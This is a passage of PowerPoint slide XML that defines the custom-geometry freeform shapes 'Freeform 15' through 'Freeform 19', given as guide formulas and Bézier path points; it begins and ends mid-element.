                <a:gd name="T34" fmla="*/ 21 w 34"/>
                <a:gd name="T35" fmla="*/ 7 h 58"/>
                <a:gd name="T36" fmla="*/ 27 w 34"/>
                <a:gd name="T37" fmla="*/ 7 h 58"/>
                <a:gd name="T38" fmla="*/ 34 w 34"/>
                <a:gd name="T39" fmla="*/ 1 h 58"/>
                <a:gd name="T40" fmla="*/ 34 w 34"/>
                <a:gd name="T41" fmla="*/ 0 h 58"/>
                <a:gd name="T42" fmla="*/ 0 w 34"/>
                <a:gd name="T43" fmla="*/ 0 h 58"/>
                <a:gd name="T44" fmla="*/ 0 w 34"/>
                <a:gd name="T45" fmla="*/ 7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58">
                  <a:moveTo>
                    <a:pt x="0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1" y="58"/>
                    <a:pt x="34" y="55"/>
                    <a:pt x="34" y="51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21" y="51"/>
                    <a:pt x="21" y="51"/>
                    <a:pt x="21" y="51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31" y="7"/>
                    <a:pt x="34" y="4"/>
                    <a:pt x="34" y="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9" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8137651" y="-440903"/>
              <a:ext cx="58415" cy="101252"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 35"/>
                <a:gd name="T1" fmla="*/ 29 h 60"/>
                <a:gd name="T2" fmla="*/ 32 w 35"/>
                <a:gd name="T3" fmla="*/ 12 h 60"/>
                <a:gd name="T4" fmla="*/ 35 w 35"/>
                <a:gd name="T5" fmla="*/ 12 h 60"/>
                <a:gd name="T6" fmla="*/ 35 w 35"/>
                <a:gd name="T7" fmla="*/ 5 h 60"/>
                <a:gd name="T8" fmla="*/ 14 w 35"/>
                <a:gd name="T9" fmla="*/ 5 h 60"/>
                <a:gd name="T10" fmla="*/ 15 w 35"/>
                <a:gd name="T11" fmla="*/ 0 h 60"/>
                <a:gd name="T12" fmla="*/ 7 w 35"/>
                <a:gd name="T13" fmla="*/ 0 h 60"/>
                <a:gd name="T14" fmla="*/ 7 w 35"/>
                <a:gd name="T15" fmla="*/ 1 h 60"/>
                <a:gd name="T16" fmla="*/ 3 w 35"/>
                <a:gd name="T17" fmla="*/ 12 h 60"/>
                <a:gd name="T18" fmla="*/ 1 w 35"/>
                <a:gd name="T19" fmla="*/ 14 h 60"/>
                <a:gd name="T20" fmla="*/ 0 w 35"/>
                <a:gd name="T21" fmla="*/ 14 h 60"/>
                <a:gd name="T22" fmla="*/ 0 w 35"/>
                <a:gd name="T23" fmla="*/ 21 h 60"/>
                <a:gd name="T24" fmla="*/ 1 w 35"/>
                <a:gd name="T25" fmla="*/ 21 h 60"/>
                <a:gd name="T26" fmla="*/ 8 w 35"/>
                <a:gd name="T27" fmla="*/ 18 h 60"/>
                <a:gd name="T28" fmla="*/ 12 w 35"/>
                <a:gd name="T29" fmla="*/ 12 h 60"/>
                <a:gd name="T30" fmla="*/ 24 w 35"/>
                <a:gd name="T31" fmla="*/ 12 h 60"/>
                <a:gd name="T32" fmla="*/ 23 w 35"/>
                <a:gd name="T33" fmla="*/ 29 h 60"/>
                <a:gd name="T34" fmla="*/ 19 w 35"/>
                <a:gd name="T35" fmla="*/ 40 h 60"/>
                <a:gd name="T36" fmla="*/ 15 w 35"/>
                <a:gd name="T37" fmla="*/ 32 h 60"/>
                <a:gd name="T38" fmla="*/ 12 w 35"/>
                <a:gd name="T39" fmla="*/ 20 h 60"/>
                <a:gd name="T40" fmla="*/ 12 w 35"/>
                <a:gd name="T41" fmla="*/ 20 h 60"/>
                <a:gd name="T42" fmla="*/ 5 w 35"/>
                <a:gd name="T43" fmla="*/ 20 h 60"/>
                <a:gd name="T44" fmla="*/ 5 w 35"/>
                <a:gd name="T45" fmla="*/ 20 h 60"/>
                <a:gd name="T46" fmla="*/ 11 w 35"/>
                <a:gd name="T47" fmla="*/ 40 h 60"/>
                <a:gd name="T48" fmla="*/ 14 w 35"/>
                <a:gd name="T49" fmla="*/ 46 h 60"/>
                <a:gd name="T50" fmla="*/ 3 w 35"/>
                <a:gd name="T51" fmla="*/ 53 h 60"/>
                <a:gd name="T52" fmla="*/ 3 w 35"/>
                <a:gd name="T53" fmla="*/ 53 h 60"/>
                <a:gd name="T54" fmla="*/ 3 w 35"/>
                <a:gd name="T55" fmla="*/ 60 h 60"/>
                <a:gd name="T56" fmla="*/ 3 w 35"/>
                <a:gd name="T57" fmla="*/ 60 h 60"/>
                <a:gd name="T58" fmla="*/ 11 w 35"/>
                <a:gd name="T59" fmla="*/ 57 h 60"/>
                <a:gd name="T60" fmla="*/ 19 w 35"/>
                <a:gd name="T61" fmla="*/ 51 h 60"/>
                <a:gd name="T62" fmla="*/ 25 w 35"/>
                <a:gd name="T63" fmla="*/ 55 h 60"/>
                <a:gd name="T64" fmla="*/ 34 w 35"/>
                <a:gd name="T65" fmla="*/ 60 h 60"/>
                <a:gd name="T66" fmla="*/ 35 w 35"/>
                <a:gd name="T67" fmla="*/ 60 h 60"/>
                <a:gd name="T68" fmla="*/ 35 w 35"/>
                <a:gd name="T69" fmla="*/ 53 h 60"/>
                <a:gd name="T70" fmla="*/ 35 w 35"/>
                <a:gd name="T71" fmla="*/ 53 h 60"/>
                <a:gd name="T72" fmla="*/ 24 w 35"/>
                <a:gd name="T73" fmla="*/ 46 h 60"/>
                <a:gd name="T74" fmla="*/ 28 w 35"/>
                <a:gd name="T75" fmla="*/ 38 h 60"/>
                <a:gd name="T76" fmla="*/ 30 w 35"/>
                <a:gd name="T77" fmla="*/ 2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5" h="60">
                  <a:moveTo>
                    <a:pt x="30" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="24"/>
                    <a:pt x="31" y="18"/>
                    <a:pt x="32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7"/>
                    <a:pt x="4" y="11"/>
                    <a:pt x="3" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="13"/>
                    <a:pt x="2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4" y="21"/>
                    <a:pt x="6" y="19"/>
                    <a:pt x="8" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="16"/>
                    <a:pt x="11" y="14"/>
                    <a:pt x="12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21"/>
                    <a:pt x="23" y="26"/>
                    <a:pt x="23" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="32"/>
                    <a:pt x="21" y="36"/>
                    <a:pt x="19" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="37"/>
                    <a:pt x="16" y="35"/>
                    <a:pt x="15" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="29"/>
                    <a:pt x="13" y="25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9"/>
                    <a:pt x="9" y="36"/>
                    <a:pt x="11" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="41"/>
                    <a:pt x="13" y="43"/>
                    <a:pt x="14" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="49"/>
                    <a:pt x="7" y="51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6" y="59"/>
                    <a:pt x="9" y="58"/>
                    <a:pt x="11" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="55"/>
                    <a:pt x="16" y="54"/>
                    <a:pt x="19" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="53"/>
                    <a:pt x="23" y="54"/>
                    <a:pt x="25" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="57"/>
                    <a:pt x="30" y="58"/>
                    <a:pt x="34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0" y="51"/>
                    <a:pt x="27" y="49"/>
                    <a:pt x="24" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="43"/>
                    <a:pt x="27" y="40"/>
                    <a:pt x="28" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="35"/>
                    <a:pt x="30" y="32"/>
                    <a:pt x="3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0" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8209306" y="-414422"/>
              <a:ext cx="113713" cy="74770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 39 w 68"/>
                <a:gd name="T1" fmla="*/ 21 h 44"/>
                <a:gd name="T2" fmla="*/ 62 w 68"/>
                <a:gd name="T3" fmla="*/ 21 h 44"/>
                <a:gd name="T4" fmla="*/ 68 w 68"/>
                <a:gd name="T5" fmla="*/ 15 h 44"/>
                <a:gd name="T6" fmla="*/ 68 w 68"/>
                <a:gd name="T7" fmla="*/ 13 h 44"/>
                <a:gd name="T8" fmla="*/ 39 w 68"/>
                <a:gd name="T9" fmla="*/ 13 h 44"/>
                <a:gd name="T10" fmla="*/ 39 w 68"/>
                <a:gd name="T11" fmla="*/ 0 h 44"/>
                <a:gd name="T12" fmla="*/ 31 w 68"/>
                <a:gd name="T13" fmla="*/ 0 h 44"/>
                <a:gd name="T14" fmla="*/ 31 w 68"/>
                <a:gd name="T15" fmla="*/ 36 h 44"/>
                <a:gd name="T16" fmla="*/ 16 w 68"/>
                <a:gd name="T17" fmla="*/ 36 h 44"/>
                <a:gd name="T18" fmla="*/ 16 w 68"/>
                <a:gd name="T19" fmla="*/ 10 h 44"/>
                <a:gd name="T20" fmla="*/ 8 w 68"/>
                <a:gd name="T21" fmla="*/ 10 h 44"/>
                <a:gd name="T22" fmla="*/ 8 w 68"/>
                <a:gd name="T23" fmla="*/ 36 h 44"/>
                <a:gd name="T24" fmla="*/ 0 w 68"/>
                <a:gd name="T25" fmla="*/ 36 h 44"/>
                <a:gd name="T26" fmla="*/ 0 w 68"/>
                <a:gd name="T27" fmla="*/ 44 h 44"/>
                <a:gd name="T28" fmla="*/ 62 w 68"/>
                <a:gd name="T29" fmla="*/ 44 h 44"/>
                <a:gd name="T30" fmla="*/ 68 w 68"/>
                <a:gd name="T31" fmla="*/ 38 h 44"/>
                <a:gd name="T32" fmla="*/ 68 w 68"/>
                <a:gd name="T33" fmla="*/ 36 h 44"/>
                <a:gd name="T34" fmla="*/ 39 w 68"/>
                <a:gd name="T35" fmla="*/ 36 h 44"/>
                <a:gd name="T36" fmla="*/ 39 w 68"/>
                <a:gd name="T37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8" h="44">
                  <a:moveTo>
                    <a:pt x="39" y="21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5" y="21"/>
                    <a:pt x="68" y="18"/>
                    <a:pt x="68" y="15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2" y="44"/>
                    <a:pt x="62" y="44"/>
                    <a:pt x="62" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="44"/>
                    <a:pt x="68" y="41"/>
                    <a:pt x="68" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="36"/>
                    <a:pt x="68" y="36"/>
                    <a:pt x="68" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="36"/>
                    <a:pt x="39" y="36"/>
                    <a:pt x="39" y="36"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="39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1" name="Freeform 17"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8209306" y="-440903"/>
              <a:ext cx="115271" cy="40501"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 68 w 69"/>
                <a:gd name="T1" fmla="*/ 17 h 24"/>
                <a:gd name="T2" fmla="*/ 63 w 69"/>
                <a:gd name="T3" fmla="*/ 16 h 24"/>
                <a:gd name="T4" fmla="*/ 60 w 69"/>
                <a:gd name="T5" fmla="*/ 13 h 24"/>
                <a:gd name="T6" fmla="*/ 56 w 69"/>
                <a:gd name="T7" fmla="*/ 7 h 24"/>
                <a:gd name="T8" fmla="*/ 52 w 69"/>
                <a:gd name="T9" fmla="*/ 2 h 24"/>
                <a:gd name="T10" fmla="*/ 44 w 69"/>
                <a:gd name="T11" fmla="*/ 0 h 24"/>
                <a:gd name="T12" fmla="*/ 22 w 69"/>
                <a:gd name="T13" fmla="*/ 0 h 24"/>
                <a:gd name="T14" fmla="*/ 11 w 69"/>
                <a:gd name="T15" fmla="*/ 7 h 24"/>
                <a:gd name="T16" fmla="*/ 8 w 69"/>
                <a:gd name="T17" fmla="*/ 13 h 24"/>
                <a:gd name="T18" fmla="*/ 4 w 69"/>
                <a:gd name="T19" fmla="*/ 17 h 24"/>
                <a:gd name="T20" fmla="*/ 0 w 69"/>
                <a:gd name="T21" fmla="*/ 17 h 24"/>
                <a:gd name="T22" fmla="*/ 0 w 69"/>
                <a:gd name="T23" fmla="*/ 17 h 24"/>
                <a:gd name="T24" fmla="*/ 0 w 69"/>
                <a:gd name="T25" fmla="*/ 24 h 24"/>
                <a:gd name="T26" fmla="*/ 0 w 69"/>
                <a:gd name="T27" fmla="*/ 24 h 24"/>
                <a:gd name="T28" fmla="*/ 8 w 69"/>
                <a:gd name="T29" fmla="*/ 23 h 24"/>
                <a:gd name="T30" fmla="*/ 15 w 69"/>
                <a:gd name="T31" fmla="*/ 17 h 24"/>
                <a:gd name="T32" fmla="*/ 18 w 69"/>
                <a:gd name="T33" fmla="*/ 10 h 24"/>
                <a:gd name="T34" fmla="*/ 20 w 69"/>
                <a:gd name="T35" fmla="*/ 8 h 24"/>
                <a:gd name="T36" fmla="*/ 23 w 69"/>
                <a:gd name="T37" fmla="*/ 8 h 24"/>
                <a:gd name="T38" fmla="*/ 44 w 69"/>
                <a:gd name="T39" fmla="*/ 8 h 24"/>
                <a:gd name="T40" fmla="*/ 48 w 69"/>
                <a:gd name="T41" fmla="*/ 8 h 24"/>
                <a:gd name="T42" fmla="*/ 50 w 69"/>
                <a:gd name="T43" fmla="*/ 10 h 24"/>
                <a:gd name="T44" fmla="*/ 54 w 69"/>
                <a:gd name="T45" fmla="*/ 18 h 24"/>
                <a:gd name="T46" fmla="*/ 59 w 69"/>
                <a:gd name="T47" fmla="*/ 23 h 24"/>
                <a:gd name="T48" fmla="*/ 68 w 69"/>
                <a:gd name="T49" fmla="*/ 24 h 24"/>
                <a:gd name="T50" fmla="*/ 69 w 69"/>
                <a:gd name="T51" fmla="*/ 24 h 24"/>
                <a:gd name="T52" fmla="*/ 69 w 69"/>
                <a:gd name="T53" fmla="*/ 17 h 24"/>
                <a:gd name="T54" fmla="*/ 68 w 69"/>
                <a:gd name="T55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9" h="24">
                  <a:moveTo>
                    <a:pt x="68" y="17"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="17"/>
                    <a:pt x="64" y="17"/>
                    <a:pt x="63" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="16"/>
                    <a:pt x="60" y="15"/>
                    <a:pt x="60" y="13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5" y="4"/>
                    <a:pt x="54" y="3"/>
                    <a:pt x="52" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="1"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="4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7" y="0"/>
                    <a:pt x="13" y="3"/>
                    <a:pt x="11" y="7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7" y="15"/>
                    <a:pt x="6" y="16"/>
                    <a:pt x="4" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="17"/>
                    <a:pt x="2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24"/>
                    <a:pt x="6" y="24"/>
                    <a:pt x="8" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="22"/>
                    <a:pt x="13" y="20"/>
                    <a:pt x="15" y="17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9" y="9"/>
                    <a:pt x="19" y="9"/>
                    <a:pt x="20" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="8"/>
                    <a:pt x="21" y="8"/>
                    <a:pt x="23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6" y="8"/>
                    <a:pt x="47" y="8"/>
                    <a:pt x="48" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="8"/>
                    <a:pt x="49" y="9"/>
                    <a:pt x="50" y="10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20"/>
                    <a:pt x="57" y="22"/>
                    <a:pt x="59" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="24"/>
                    <a:pt x="64" y="24"/>
                    <a:pt x="68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69" y="17"/>
                    <a:pt x="69" y="17"/>
                    <a:pt x="69" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6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2" name="Freeform 18"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7600239" y="-267218"/>
              <a:ext cx="59972" cy="59193"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 36"/>
                <a:gd name="T1" fmla="*/ 20 h 35"/>
                <a:gd name="T2" fmla="*/ 10 w 36"/>
                <a:gd name="T3" fmla="*/ 19 h 35"/>
                <a:gd name="T4" fmla="*/ 18 w 36"/>
                <a:gd name="T5" fmla="*/ 20 h 35"/>
                <a:gd name="T6" fmla="*/ 14 w 36"/>
                <a:gd name="T7" fmla="*/ 29 h 35"/>
                <a:gd name="T8" fmla="*/ 16 w 36"/>
                <a:gd name="T9" fmla="*/ 33 h 35"/>
                <a:gd name="T10" fmla="*/ 2 w 36"/>
                <a:gd name="T11" fmla="*/ 35 h 35"/>
                <a:gd name="T12" fmla="*/ 9 w 36"/>
                <a:gd name="T13" fmla="*/ 29 h 35"/>
                <a:gd name="T14" fmla="*/ 5 w 36"/>
                <a:gd name="T15" fmla="*/ 23 h 35"/>
                <a:gd name="T16" fmla="*/ 1 w 36"/>
                <a:gd name="T17" fmla="*/ 20 h 35"/>
                <a:gd name="T18" fmla="*/ 9 w 36"/>
                <a:gd name="T19" fmla="*/ 8 h 35"/>
                <a:gd name="T20" fmla="*/ 12 w 36"/>
                <a:gd name="T21" fmla="*/ 0 h 35"/>
                <a:gd name="T22" fmla="*/ 19 w 36"/>
                <a:gd name="T23" fmla="*/ 8 h 35"/>
                <a:gd name="T24" fmla="*/ 12 w 36"/>
                <a:gd name="T25" fmla="*/ 11 h 35"/>
                <a:gd name="T26" fmla="*/ 13 w 36"/>
                <a:gd name="T27" fmla="*/ 12 h 35"/>
                <a:gd name="T28" fmla="*/ 17 w 36"/>
                <a:gd name="T29" fmla="*/ 18 h 35"/>
                <a:gd name="T30" fmla="*/ 12 w 36"/>
                <a:gd name="T31" fmla="*/ 18 h 35"/>
                <a:gd name="T32" fmla="*/ 9 w 36"/>
                <a:gd name="T33" fmla="*/ 13 h 35"/>
                <a:gd name="T34" fmla="*/ 0 w 36"/>
                <a:gd name="T35" fmla="*/ 17 h 35"/>
                <a:gd name="T36" fmla="*/ 1 w 36"/>
                <a:gd name="T37" fmla="*/ 11 h 35"/>
                <a:gd name="T38" fmla="*/ 2 w 36"/>
                <a:gd name="T39" fmla="*/ 3 h 35"/>
                <a:gd name="T40" fmla="*/ 7 w 36"/>
                <a:gd name="T41" fmla="*/ 6 h 35"/>
                <a:gd name="T42" fmla="*/ 2 w 36"/>
                <a:gd name="T43" fmla="*/ 3 h 35"/>
                <a:gd name="T44" fmla="*/ 11 w 36"/>
                <a:gd name="T45" fmla="*/ 28 h 35"/>
                <a:gd name="T46" fmla="*/ 8 w 36"/>
                <a:gd name="T47" fmla="*/ 23 h 35"/>
                <a:gd name="T48" fmla="*/ 17 w 36"/>
                <a:gd name="T49" fmla="*/ 1 h 35"/>
                <a:gd name="T50" fmla="*/ 15 w 36"/>
                <a:gd name="T51" fmla="*/ 7 h 35"/>
                <a:gd name="T52" fmla="*/ 17 w 36"/>
                <a:gd name="T53" fmla="*/ 1 h 35"/>
                <a:gd name="T54" fmla="*/ 26 w 36"/>
                <a:gd name="T55" fmla="*/ 1 h 35"/>
                <a:gd name="T56" fmla="*/ 35 w 36"/>
                <a:gd name="T57" fmla="*/ 7 h 35"/>
                <a:gd name="T58" fmla="*/ 33 w 36"/>
                <a:gd name="T59" fmla="*/ 9 h 35"/>
                <a:gd name="T60" fmla="*/ 36 w 36"/>
                <a:gd name="T61" fmla="*/ 32 h 35"/>
                <a:gd name="T62" fmla="*/ 27 w 36"/>
                <a:gd name="T63" fmla="*/ 28 h 35"/>
                <a:gd name="T64" fmla="*/ 17 w 36"/>
                <a:gd name="T65" fmla="*/ 33 h 35"/>
                <a:gd name="T66" fmla="*/ 21 w 36"/>
                <a:gd name="T67" fmla="*/ 14 h 35"/>
                <a:gd name="T68" fmla="*/ 18 w 36"/>
                <a:gd name="T69" fmla="*/ 14 h 35"/>
                <a:gd name="T70" fmla="*/ 30 w 36"/>
                <a:gd name="T71" fmla="*/ 9 h 35"/>
                <a:gd name="T72" fmla="*/ 23 w 36"/>
                <a:gd name="T73" fmla="*/ 10 h 35"/>
                <a:gd name="T74" fmla="*/ 30 w 36"/>
                <a:gd name="T75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" h="35">
                  <a:moveTo>
                    <a:pt x="1" y="20"/>
                  </a:move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7" y="19"/>
                    <a:pt x="8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20"/>
                    <a:pt x="9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7" y="25"/>
                    <a:pt x="15" y="27"/>
                    <a:pt x="14" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="29"/>
                    <a:pt x="16" y="30"/>
                    <a:pt x="18" y="3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3" y="31"/>
                    <a:pt x="12" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="32"/>
                    <a:pt x="6" y="34"/>
                    <a:pt x="2" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="34"/>
                    <a:pt x="1" y="33"/>
                    <a:pt x="0" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="32"/>
                    <a:pt x="7" y="31"/>
                    <a:pt x="9" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="28"/>
                    <a:pt x="5" y="27"/>
                    <a:pt x="3" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="25"/>
                    <a:pt x="4" y="24"/>
                    <a:pt x="5" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="23"/>
                    <a:pt x="1" y="23"/>
                    <a:pt x="1" y="23"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="20"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1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5" y="13"/>
                    <a:pt x="17" y="15"/>
                    <a:pt x="18" y="16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5" y="17"/>
                    <a:pt x="14" y="15"/>
                    <a:pt x="12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7" y="15"/>
                    <a:pt x="5" y="17"/>
                    <a:pt x="2" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="18"/>
                    <a:pt x="1" y="17"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="15"/>
                    <a:pt x="6" y="13"/>
                    <a:pt x="8" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="11"/>
                    <a:pt x="1" y="11"/>
                    <a:pt x="1" y="11"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="8"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2" y="3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5" y="3"/>
                    <a:pt x="6" y="4"/>
                    <a:pt x="7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3" y="4"/>
                    <a:pt x="2" y="3"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="6" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="26"/>
                    <a:pt x="9" y="27"/>
                    <a:pt x="11" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="26"/>
                    <a:pt x="14" y="25"/>
                    <a:pt x="15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7" y="24"/>
                    <a:pt x="7" y="24"/>
                    <a:pt x="6" y="25"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="4"/>
                    <a:pt x="17" y="6"/>
                    <a:pt x="15" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="7"/>
                    <a:pt x="14" y="7"/>
                    <a:pt x="14" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="5"/>
                    <a:pt x="16" y="3"/>
                    <a:pt x="17" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="23" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="1"/>
                    <a:pt x="26" y="1"/>
                    <a:pt x="26" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="3"/>
                    <a:pt x="25" y="5"/>
                    <a:pt x="2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16"/>
                    <a:pt x="31" y="22"/>
                    <a:pt x="29" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="28"/>
                    <a:pt x="33" y="30"/>
                    <a:pt x="36" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="33"/>
                    <a:pt x="34" y="34"/>
                    <a:pt x="34" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="33"/>
                    <a:pt x="29" y="31"/>
                    <a:pt x="27" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="31"/>
                    <a:pt x="22" y="33"/>
                    <a:pt x="19" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="35"/>
                    <a:pt x="18" y="34"/>
                    <a:pt x="17" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="31"/>
                    <a:pt x="23" y="28"/>
                    <a:pt x="25" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="22"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="21" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="15"/>
                    <a:pt x="20" y="16"/>
                    <a:pt x="20" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="16"/>
                    <a:pt x="19" y="15"/>
                    <a:pt x="18" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="11"/>
                    <a:pt x="23" y="6"/>
                    <a:pt x="23" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="30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10"/>
                    <a:pt x="23" y="10"/>
                    <a:pt x="23" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="15"/>
                    <a:pt x="25" y="19"/>
                    <a:pt x="27" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="20"/>
                    <a:pt x="30" y="15"/>
                    <a:pt x="3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3" name="Freeform 19"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7717068" y="-267218"/>
              <a:ext cx="57635" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 35"/>
                <a:gd name="T1" fmla="*/ 21 h 34"/>
                <a:gd name="T2" fmla="*/ 17 w 35"/>
                <a:gd name="T3" fmla="*/ 21 h 34"/>
                <a:gd name="T4" fmla="*/ 17 w 35"/>
                <a:gd name="T5" fmla="*/ 19 h 34"/>
                <a:gd name="T6" fmla="*/ 23 w 35"/>
                <a:gd name="T7" fmla="*/ 14 h 34"/>
                <a:gd name="T8" fmla="*/ 6 w 35"/>
                <a:gd name="T9" fmla="*/ 14 h 34"/>
                <a:gd name="T10" fmla="*/ 6 w 35"/>
                <a:gd name="T11" fmla="*/ 12 h 34"/>
                <a:gd name="T12" fmla="*/ 28 w 35"/>
                <a:gd name="T13" fmla="*/ 12 h 34"/>
                <a:gd name="T14" fmla="*/ 28 w 35"/>
                <a:gd name="T15" fmla="*/ 15 h 34"/>
                <a:gd name="T16" fmla="*/ 19 w 35"/>
                <a:gd name="T17" fmla="*/ 20 h 34"/>
                <a:gd name="T18" fmla="*/ 19 w 35"/>
                <a:gd name="T19" fmla="*/ 21 h 34"/>
                <a:gd name="T20" fmla="*/ 35 w 35"/>
                <a:gd name="T21" fmla="*/ 21 h 34"/>
                <a:gd name="T22" fmla="*/ 35 w 35"/>
                <a:gd name="T23" fmla="*/ 23 h 34"/>
                <a:gd name="T24" fmla="*/ 19 w 35"/>
                <a:gd name="T25" fmla="*/ 23 h 34"/>
                <a:gd name="T26" fmla="*/ 19 w 35"/>
                <a:gd name="T27" fmla="*/ 30 h 34"/>
